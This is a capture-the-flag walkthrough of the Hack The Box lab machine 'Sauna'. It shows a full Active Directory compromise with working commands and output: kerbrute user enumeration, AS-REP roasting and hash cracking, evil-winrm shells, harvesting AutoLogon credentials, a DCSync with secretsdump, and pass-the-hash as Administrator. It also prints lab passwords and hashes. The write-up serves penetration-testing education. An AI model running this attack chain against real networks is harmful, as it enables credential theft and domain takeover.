Home HTB Sauna
Post
Cancel

HTB Sauna

Sauna

NameSauna
OSWindows
RELEASE DATE15 Feb 2020
DIFFICULTYEasy

Port Scan

We can see from the port scan it leaks the Domain EGOTISTICAL-BANK.LOCAL0. There are also three services that have a good attack surface http 80, smb 445, and ldap 389.

We can also look and see that this is probably a domain controller. Having ports; 53 DNS, 88 Kerberos, and 445 are common DC ports

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PORT      STATE SERVICE       VERSION                                                         
53/tcp    open  domain        Simple DNS Plus                                                 
80/tcp    open  http          Microsoft IIS httpd 10.0                                        
|_http-title: Egotistical Bank :: Home                                                        
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                     
| http-methods:                                                                               
|_  Potentially risky methods: TRACE                                                          
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-25 11:35:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                                          
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                  
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)                                                                           
445/tcp   open  microsoft-ds?                                                                 
464/tcp   open  kpasswd5?                                                                     
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                                            
636/tcp   open  tcpwrapped                                                                    
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)                                                                           
3269/tcp  open  tcpwrapped                                                                    
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                         
|_http-server-header: Microsoft-HTTPAPI/2.0                                                   
|_http-title: Not Found                                                                       
9389/tcp  open  mc-nmf        .NET Message Framing                                            
49667/tcp open  msrpc         Microsoft Windows RPC                  
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC                                                                                                                                          
49689/tcp open  msrpc         Microsoft Windows RPC                                           
49697/tcp open  msrpc         Microsoft Windows RPC                                           
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB 445

I like to use crackmapexec to enumerate SMB.

General Info about host

We can see the hostname, domain, and see if SMBv1 is enabled

1
2
3
4
┌──(root💀kali)-[~/htb/sauna]
└─# crackmapexec smb 10.10.10.175
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)

View Shares

We cant view any shares

1
2
3
4
┌──(root💀kali)-[~/htb/sauna]
└─# crackmapexec smb 10.10.10.175 --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.)

Sometimes we can try doing a null session to see if we can get anything else. A null session is simply providing nothing for the username and password. But still nothing

1
2
3
4
5
6
┌──(root💀kali)-[~/htb/sauna]
└─# crackmapexec smb 10.10.10.175 --shares -u '' -p ''
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [-] EGOTISTICAL-BANK.LOCAL\: STATUS_ACCESS_DENIED 
SMB         10.10.10.175    445    SAUNA            [-] Error enumerating shares: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

We can also try another tool called smbmap to see if it gives us anything different but it doesn’t.

1
2
3
┌──(root💀kali)-[~/htb/sauna]
└─# smbmap  -H 10.10.10.175
[+] IP: 10.10.10.175:445        Name: 10.10.10.175  

Let’s move on

HTTP 80

Harvesting Usernames

On the about page http://10.10.10.175/about.html we can see that there is a “Meet The Team” section and find a handful of people. I recorded each of the names in a file called users.txt

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/htb/sauna]
└─# cat users.txt                                                                                                                                                                        
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb

Next I’ll use a tool called username-anarchy to transform the word list of names to one with common username schemas https://github.com/urbanadventurer/username-anarchy.git

1
2
┌──(root💀kali)-[~/htb/sauna/username-anarchy]
└─# ./username-anarchy --input-file ../users.txt --select-format first,last,first.last,flast > ../usernames.txt

I’ll also add Administrator to the file as well.

Kerbrute

Now that I have a list of possible usernames I can use a tool called kerbrute to test and see if any of the usernames are valid.

The cool thing about kerbrute is it won’t create event id 4625 in the logs. Event id 4625 will document every failed log-on. This will instead create a Kerberos failure event id 4771, its not logged by default.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[~/htb/sauna]
└─# kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/25/22 - Ronnie Flathers @ropnop

2022/01/25 22:21:25 >  Using KDC(s):
2022/01/25 22:21:25 >   10.10.10.175:88

2022/01/25 22:21:25 >  [+] VALID USERNAME:       administrator@EGOTISTICAL-BANK.LOCAL
2022/01/25 22:21:25 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL
2022/01/25 22:21:25 >  Done! Tested 25 usernames (2 valid) in 0.238 seconds

Kerberoast

Now that we have two valid usernames we can leverage some impackt scripts https://github.com/SecureAuthCorp/impacket. The one I used on this box was GetNPUser.py which will do an AS_REP Roast/Kerberoast.

1
2
3
4
5
6
7
8
┌──(root💀kali)-[/opt/impacket/examples]
└─# python3 GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith
Impacket v0.9.25.dev1+20220119.101925.12de27dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a88bc53aa07e855b1c57e31ff85780a8$28b0d67b38160f63468db4c5d28407b29b6cfdc798da3898a953bc19432e53b061cbdc19e69c51abfad56049aeae20167852e49863621f7ba42fd26d5f140ff7e385005b958dc4cca21d0e7fc91df9a5848498d7a74b356a0e406a46c8d8c7e229b101059a01092348b14ff2c35ebff3ca39a9218c13aae0b181d4b210bf7f826abaed135e722b613321e50c33f7afe5cdc433973c8729a64abece60651114462bb12f6cfc4850f738e88a6eee77ed78c5840fd27cd51cc5b0596d92961f9acd93b27c92944ed423fe897941578168b146e278810de6d683ec7689617e15f890ab122cadd405437f3354eea4580e8eba01a87d75c2c02565b6229ec0f7d5dbb6
                         

Now that we have a hash we can use hashcat to crack it. I did this on my host machine to utilize a GPU. We get a hit and now have a creds fsmith:Thestrokes23

1
2
3
4
5
6
7
8
9
.\hashcat.exe -m 18200 ..\hash.txt ..\rockyou.txt --force

Dictionary cache hit:
* Filename..: ..\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a88bc53aa07e855b1c57e31ff85780a8$28b0d67b38160f63468db4c5d28407b29b6cfdc798da3898a953bc1                                                                                                           19432e53b061cbdc19e69c51abfad56049aeae20167852e49863621f7ba42fd26d5f140ff7e385005b958dc4cca21d0e7fc91df9a5848498d7a74b356a0e406a46c8d                                                                                                           d8c7e229b101059a01092348b14ff2c35ebff3ca39a9218c13aae0b181d4b210bf7f826abaed135e722b613321e50c33f7afe5cdc433973c8729a64abece606511144                                                                                                           462bb12f6cfc4850f738e88a6eee77ed78c5840fd27cd51cc5b0596d92961f9acd93b27c92944ed423fe897941578168b146e278810de6d683ec7689617e15f890ab1                                                                                                           122cadd405437f3354eea4580e8eba01a87d75c2c02565b6229ec0f7d5dbb6:Thestrokes23

SMB PT2

Now that we have some valid credentials fsmith:Thestrokes23 we can try and authenticate to SMB again using crackmapexec and we can see that we have valid creds!

1
2
3
4
┌──(root💀kali)-[~/htb/sauna]
└─# crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23  
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 

Next I will enumerate shares and one sticks out RICOH Aficio SP 8300DN PCL 6.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~/htb/sauna]
└─# crackmapexec smb 10.10.10.175 -u 'fsmith' -p 'Thestrokes23' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
SMB         10.10.10.175    445    SAUNA            [+] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share 
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6                 We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share 

Taking a look at searchsploit there are a handful of exploits for this but we need a shell first. We can see that we can authenticate with winrm

1
2
3
4
5
6
┌──(root💀kali)-[~/htb/sauna]
└─# crackmapexec winrm 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'    
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [*] http://10.10.10.175:5985/wsman
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

I’ll use evil-winrm to get a shell

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/htb/sauna]
└─# evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23       

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>

Taking a look at the Desktop we can grab our user flag

Privilege Escalation

I uploaded a great tool called winPEAS that is great for some automation when trying to escalate. I uploaded it using Evil-WinRM and

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /opt/windowsPriv/winPEASx64.exe
Info: Uploading /opt/windowsPriv/winPEASx64.exe to C:\Users\FSmith\Documents\winPEASx64.exe

                                                             
Data: 2574336 bytes of 2574336 bytes copied

Info: Upload successful!

We get a lot of output from this but one section sticks outs particularly, the AutoLogon! A service account has an auto logon enabled and we can harvest svc_loanmgr:Moneymakestheworldgoround! as valid credentials.

1
2
3
4
5
Looking for AutoLogon credentials                                                                                                                                               
    Some AutoLogon credentials were found                                                                                                                                                    
    DefaultDomainName             :  EGOTISTICALBANK                                                                                                                                         
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager                                                                                                                         
    DefaultPassword               :  Moneymakestheworldgoround!  

We can try those credentials with Evil-WINRM and we get in!

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[~/htb/sauna]
└─# evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr

Root

With these credentials, we can run a tool called Bloodhound. It is a tool that finds hidden relationships within Active Directory. It can often lead to some quick privilege escalation. There is a python & impacket version of it that I’ll be using for Sauna.

Installing is very easy

1
2
sudo apt install bloodhound
sudo pip install bloodhound

Then we can run the command bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -d EGOTISTICAL- BANK.LOCAL -ns 10.10.10.175 -c All to start the attack. It created a lot of .json files that we will import into bloodhound.

1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[~/htb/sauna/bloodhound]
└─# ls
20220317121125_computers.json  20220317121125_domains.json  20220317121125_groups.json  20220317121125_users.json
                                                                                                                                                                                             
┌──(root💀kali)-[~/htb/sauna/bloodhound]
└─# zip bloodhound.zip *     
  adding: 20220317121125_computers.json (deflated 76%)
  adding: 20220317121125_domains.json (deflated 82%)
  adding: 20220317121125_groups.json (deflated 95%)
  adding: 20220317121125_users.json (deflated 92%)

To start the bloodhound console I ran neo4j console then bloodhound in the console. Next, we will upload our files by clicking the upload button on the right

Sauna

After importing our files we can select “Find Principals with DCSync Rights” and it generates a graph. Our service account has two permissions. Notice its similar permissions of administrators.

  1. GetChanges
  2. GetChangesAll

Sauna

I right-clicked the relation and selected “Help”. Under the Abuse info,m I learned that we can perform a dcsync attack to get password hashes.

Sauna

Impacket has a tool called secretsdump.py we can use to leverage this.

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[/opt/impacket/examples]
└─# secretsdump.py egotistical-bank/svc_loanmgr@10.10.10.175 -just-dc-user Administrator                                                                                                 2 ⨯
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up...

Now we have the admins Hash! We can use it in a pass the hash attack

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[/opt/impacket/examples]
└─# evil-winrm -i 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
This post is licensed under CC BY 4.0 by the author.